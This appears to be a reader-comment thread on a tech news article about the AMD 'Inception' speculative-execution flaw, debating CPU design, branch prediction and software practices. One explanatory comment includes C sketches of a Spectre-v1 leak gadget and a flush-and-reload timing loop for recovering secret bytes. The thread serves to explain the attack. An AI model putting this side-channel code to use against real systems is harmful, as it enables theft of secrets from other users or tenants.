
Epyc fail there
Hahah! All those fools who bought AMD kit. Serves you right!
Me with my GenuineIntel CPU on the other hand .... Oh, wait. Nevermind
AMD processor users, you have another data-leaking vulnerability to deal with: like Zenbleed, this latest hole can be used to steal sensitive data from a running vulnerable machine. The flaw (CVE-2023-20569), dubbed Inception in reference to the Christopher Nolan flick about manipulating a person's dreams to achieve a desired …
That's possible, of course, but these microarchitectural side channels are really easy to introduce accidentally (they amount to failing to clean everything up), and because there are so many of them they're difficult to find comprehensively. Zenbleed was found by microarchitectural fuzzing (dunno about Inception, as I haven't gotten to the paper yet), which is a stochastic process, not exhaustive. CPU manufacturers have limited resources just like everyone else, and their testing focus will be on getting the correct documented behavior from the chips.
I built a home-brew desktop PC several years ago, and decided, that time around, to move from AMD chips to Intel. A shiny new Intel Core i7-6700K, no less. And then someone found it was full of holes. Recently I was thinking of replacing the CPU/motherboard/RAM with an AMD combination. A new-ish laptop has an octo-core AMD Ryzen 7 PRO 5850U, and the quad-core desktop CPU seems quaint by comparison. So I have been browsing motherboards and CPU options that behave with Rocky Linux 8 and play nice with VirtualBox. An 8-core CPU is a reasonable chunk of cash, and I was thinking AMD, based on what happened with Intel. And now they have holes too! Are there any processors out there that do not contain serious bugs? Asking for a friend...
"Are there any processors out there that do not contain serious bugs? Asking for a friend..."
Serious answer ....... No.
The bugs are either not found *yet* or, as in the recent cases at Intel & AMD, 'there as expected'.
The real question is: are these 'bugs' genuine mistakes, or convenient facilitators for the three-letter organisations we all know so well?!
:)
Or computers with non-trusted software downloaded. Consider pads and smartphones, which all have dozens of partially trusted apps downloaded, "protected" by the OS sandbox.
Yes, I know it's not AMD, but this is a proof-of-concept for what can be done against poorly-considered speculative execution implementations. *Everything* has SpecEx. The starting gun really fires when someone takes down some ARM processors:
https://developer.arm.com/Arm%20Security%20Center/Speculative%20Processor%20Vulnerability
Remember, these are attacks against implementations, not the ISA. Just because ARM's own cores are mitigated doesn't mean that, say, a Qualcomm or Apple ARM-compatible implementation is. And if anyone ever lets a dozen different shonky RISC-V speculative execution implementations out into the wild, we might as well go back into caves and hit each other with sticks. Fortunately, that's twenty years away, and always will be.
For most day to day work we really don't need multiple cores running sophisticated multi-pipeline processors. We only do this because we run horrendously inefficient software which all has to execute at the same priority level.
Bigger is not automatically better.
I take the sentiment, but suggest the answer is the opposite. The underlying problem is indeed pointlessly abstracted code, written without any thought to performance, which creates a push for single-threaded performance at all costs. Deep pipelines and speculative execution have been the hardware response. But a better HW solution would be lowered clock frequency and shallow pipelines, which would remove (much of) the need for speculative execution. Then we could afford the power and area for hundreds of low-complexity CPU cores: cache already consumes 90%+ of silicon area, so the cores themselves are comparatively cheap.
The critical issue is getting compilers to be able to split the problem onto large numbers of threads automatically… which they can't do, because neither the compiler *nor the developer* has an f'ing clue what actual typical program flow is, because "object-oriented".
But the problem is even more on-topic than that. This particular security flaw occurs because a CPU hardware branch predictor can be forced to mis-predict. So we can ask: why do CPUs have HW branch predictors at all, rather than hard-coded compiler hints? The answer is… object-oriented and DRY (Don't Repeat Yourself). Two or more entirely different logical causes result in the same section of code being executed. Due to modern software practices, there simply is no single answer to "what is the most likely branch?"; it depends on what called it. Hence run-time branch predictors. This is a *direct* consequence of object-oriented design and DRY.
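For what it's worth, "hard-coded compiler hints" do exist today in a limited form. Here's a minimal sketch using GCC/Clang's __builtin_expect (the builtin is real; the record-parsing scenario is invented for illustration). It also illustrates the point above: a single static hint like this only makes sense when the code has one dominant caller and one dominant outcome.

    #include <stdio.h>

    /* Static branch hints: the compile-time alternative to run-time prediction.
     * __builtin_expect tells the compiler which outcome to lay out as the
     * fall-through (hot) path. */
    #define likely(x)   __builtin_expect(!!(x), 1)
    #define unlikely(x) __builtin_expect(!!(x), 0)

    /* Hypothetical record handler: the NULL/error case is declared rare,
     * so the compiler optimises the layout for the non-NULL path. */
    static int process_record(const char *rec)
    {
        if (unlikely(rec == NULL)) {
            fprintf(stderr, "bad record\n");
            return -1;
        }
        /* hot path */
        printf("processing %s\n", rec);
        return 0;
    }

    int main(void)
    {
        const char *records[] = { "alpha", "beta", NULL, "gamma" };
        int errors = 0;

        for (unsigned i = 0; i < sizeof records / sizeof records[0]; i++)
            if (process_record(records[i]) != 0)
                errors++;

        return errors ? 1 : 0;
    }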
I'm nowhere near knowledgeable enough on this subject to be able to tell whether your analysis and solution are intelligent or ill-informed in the first place.
But it does give the impression of involving somewhat similar issues to those that Intel's Itanium CPU revolved around: the reliance on the assumption that the compiler would, and could, be responsible for instruction scheduling statically, something existing CPU designs normally did at runtime (i.e. dynamically), and its failure in part because, in Donald Knuth's words, such compilers turned out to be "impossible to write".
You say that "due to modern software practices, there simply is no single answer as to 'what is the most likely branch'". Am I correct in assuming that you'd blame this whole modern approach to writing software for making compiler-generated static scheduling effectively an impossible task?
It sounds about right. I have written a lot of close-to-the-hardware code that squeezes the maximum performance out of a processor and its memory, so I got very familiar with the properties of pipelined processors. The nature of my work, though, was such that I'd be using simpler / lower-performance processors, and the code being embedded meant that you always had to know what was going on at all times in the system. I've also met misapplied object design many times over the years; it's how we train programmers, so naturally this is how they design code. I've found that the resulting code is messy beyond belief -- the top-level design may seem clean enough, but the implementation becomes so disjointed that nobody's sure what's going on. Untangling everything can literally be beyond the capabilities of a smart programmer -- I have witnessed programmers driven to despair (and resignation) by this kind of code, pushback just not being possible because it's the 'correct' way to write code and anyone who begs to differ is obviously not a real programmer.
Yes, that is my conclusion, although I wouldn't necessarily go all the way to static scheduling. There is a middle way, e.g. unspeculated out-of-order execution and register renaming.
Knuth’s point: “such compilers turned out to be impossible to write", I would turn upside down. The software industry decided that we needed to be able to write arbitrary general code, and stuff the consequences. And indeed, it seems to be too difficult to compile that effectively, to the microarchitecture that we would want. But the alternative is simple: decide to change coding standards (mostly) or language (occasionally) to allow reasonable compilers to function. Why evangelise SOLID, polymorphism, object-oriented, dynamic typing etc, when it leads to this shitshow outcome? Why not select software standards to match machine constraints, or at least match microarchitectures to standard software constructs?
Here's an example: Linux has had a standard stack size of 8MB per process "because it doesn't hurt anything, it's negligible compared to main memory" since 1995. Except it does hurt. If we placed a 2MB hardware constraint on stack size, CPUs could (now) implement the stack in on-chip RAM (not cache!). Deterministic low access time to the stack would make just a *massive* difference, including for security: you can make much harder guarantees against stack overflow, plus add a separate physical call-stack buffer. Dividing heap/stack as off-chip/on-chip would also be quite a logical distinction.
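For anyone who wants to check that 8MB figure on their own box, here's a quick sketch in C. getrlimit() is standard POSIX; the values printed are whatever your distro ships (typically 8 MiB soft, unlimited hard), and `ulimit -s` shows the same thing from the shell.

    #include <stdio.h>
    #include <sys/resource.h>

    int main(void)
    {
        struct rlimit rl;

        /* RLIMIT_STACK is the per-process stack size limit the kernel enforces. */
        if (getrlimit(RLIMIT_STACK, &rl) != 0) {
            perror("getrlimit");
            return 1;
        }

        /* On a stock Linux install the soft limit typically prints 8388608 (8 MiB);
         * the hard limit is often RLIM_INFINITY, which prints as a huge number. */
        printf("stack soft limit: %llu bytes\n", (unsigned long long)rl.rlim_cur);
        printf("stack hard limit: %llu bytes\n", (unsigned long long)rl.rlim_max);
        return 0;
    }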
There are half a dozen other examples. But absolutely nobody commercial is taking this kind of HW/SW co-design seriously. That's my real point. People may well have their own opinion on whether the specific idea of an on-chip stack is good or not. But there's no industrial *mechanism* to make such radical changes any more. Everything is designed for "the general case", whatever the consequence.
Or computers with non-trusted software downloaded
Which is basically all consumer general-use computers, of course. You don't need to worry about malware exploiting microarchitectural side channels if you're blithely installing random crap from whatever source with elevated permissions. Key loggers are a lot more effective.
Which is not to say that these attacks aren't worth researching and, in appropriate cases, mitigating; just that people need to keep their threat model in mind.
Shared computers including virtual hosts that run unknown servers running unknown processes*
*Even within a single organisation that controls everything, there are likely multiple groups involved in running a virtual server, and likely nobody has an overall view of everything. This gets worse in the public cloud, even when running private networks.
Part of the problem is the cross-sharing of IP between Intel and AMD. x86 is Intel's IP and x64 is AMD's. So, because the basic architecture is the same (x64 layered on x86), you will often see similar holes from both manufacturers (there are nuances that separate them). The only way this really changes is if we can come up with a new standard away from x86/x64. However, that means giving up backwards compatibility, and no one wants to kick that hornets' nest for fear of losing sales (my opinion).
It goes something like this:
Essentially, if you're a low-privileged, authorised, logged-in user, you can craft code along the lines of "give me the root password" and arrange it so that it executes in a branch following an if statement. Ideally, when the code reaches the "give me the root password" section it should get firmly rebuffed and the process terminated with a nasty exception, or something.
The CPU, to save time, will guess which way the if is going to go and start executing down that pathway whilst the condition itself is still being evaluated. The idea is that, if the guess is right, the CPU has already headed a good way down the correct execution pathway by the time the condition is resolved. This makes it faster, and is something that's more or less necessary to keep long instruction execution pipelines moving.
The trouble is that, in speculatively executing code like this, it seems modern CPUs are a little bit casual about "user privilege", and can actually execute code that the user is not privileged to execute. It's a "run first, ask the question 'should I?' later" thing. So, it might actually let the branch execute the "what's the root password?" instruction, even though the user is not privileged to do so. But because it's disposing of this branch (it's the wrong side of the if), the CPU never gets round to asking the question. It shouldn't matter, because this branch's data is going to get dumped anyway.
The problem is that, in cleaning up the dead-end branch's data that shouldn't have been acquired, CPUs do not account for everything else someone might have written into their code (things like cache loads and flushes). So the dead-end branch, having learned a secret but having no architectural way of handing it to the remainder of the program (because the CPU is going to dispose of the branch and its results), can still give away hints of what the data was by either touching a particular cache line, or not. Do that repeatedly (repeatedly call the carefully crafted if statement) and you can learn the secret and exfiltrate it bit by bit through what has, or hasn't, ended up in the cache.
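In code, the "carefully crafted if statement" in this family of attacks looks something like the classic Spectre-v1 bounds-check gadget sketched below. This is a hedged illustration, not the Inception exploit itself (which abuses the return-address predictor rather than a plain if), and all the names (array1, probe, victim) are invented for the example.

    #include <stddef.h>
    #include <stdint.h>

    #define PAGE 4096

    uint8_t array1[16];
    size_t  array1_size = 16;

    /* One page per possible byte value; which page ends up cached encodes the secret. */
    uint8_t probe[256 * PAGE];

    /* Global sink so the compiler cannot discard the secret-dependent read. */
    uint8_t temp;

    void victim(size_t x)
    {
        /* Architecturally, an out-of-bounds x never gets past this check.
         * Speculatively, a mistrained predictor can run the body anyway,
         * reading array1[x] from out of bounds (some "secret" byte elsewhere
         * in memory) and touching probe[value * PAGE], which pulls that
         * cache line in before the misprediction is rolled back. */
        if (x < array1_size) {
            uint8_t value = array1[x];
            temp &= probe[value * PAGE];   /* secret-dependent cache footprint */
        }
    }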
Meanwhile another program is paying close attention to execution times of its code, and can see the side effects of the cache either being cleared or not cleared. This is a bit like this program picking up a Morse radio signal from a transmitter; eventually it learns the secret.
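And the "program paying close attention to execution times" is, continuing the same sketch, a flush-and-reload loop: evict every candidate cache line, poke the victim, then time the reloads. The x86 intrinsics (_mm_clflush, __rdtscp) are real; the cycle threshold is a made-up ballpark that would need calibrating on real hardware, and real attacks need many noisy repetitions rather than one clean pass.

    #include <stddef.h>
    #include <stdint.h>
    #include <x86intrin.h>

    #define PAGE 4096

    /* Defined alongside the victim sketch above. */
    extern uint8_t probe[256 * PAGE];
    extern void victim(size_t x);

    static uint64_t time_load(volatile uint8_t *p)
    {
        unsigned aux;
        uint64_t t0 = __rdtscp(&aux);   /* timestamp before the load */
        (void)*p;                       /* volatile read: not optimised away */
        uint64_t t1 = __rdtscp(&aux);
        return t1 - t0;
    }

    /* Returns the byte value whose probe line came back "fast" (i.e. cached,
     * so the victim touched it speculatively); -1 if nothing obvious showed up. */
    int guess_byte(size_t malicious_x)
    {
        for (int i = 0; i < 256; i++)
            _mm_clflush(&probe[i * PAGE]);      /* evict every candidate line */

        victim(malicious_x);                    /* the speculative leak happens here */

        for (int i = 0; i < 256; i++)
            if (time_load(&probe[i * PAGE]) < 80)   /* rough cache-hit threshold, cycles */
                return i;
        return -1;
    }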
The Register did very well to highlight this type of flaw early, a long time ago. It's a fundamental problem for CPU designs; long pipelines and speculative execution are necessary for high-speed performance. Do away with speculative execution and we're back to the computing dark ages. Make the speculative execution more fussy about user privilege, and things also slow down.
These hacks are mostly a problem for major networks, right? Yes, small/home nets are vulnerable, but it's too much trouble for not enough gain to hack them. The money's in corporate, government and similar nets. I have to care at the office, but not at home, correct? Or am I missing something?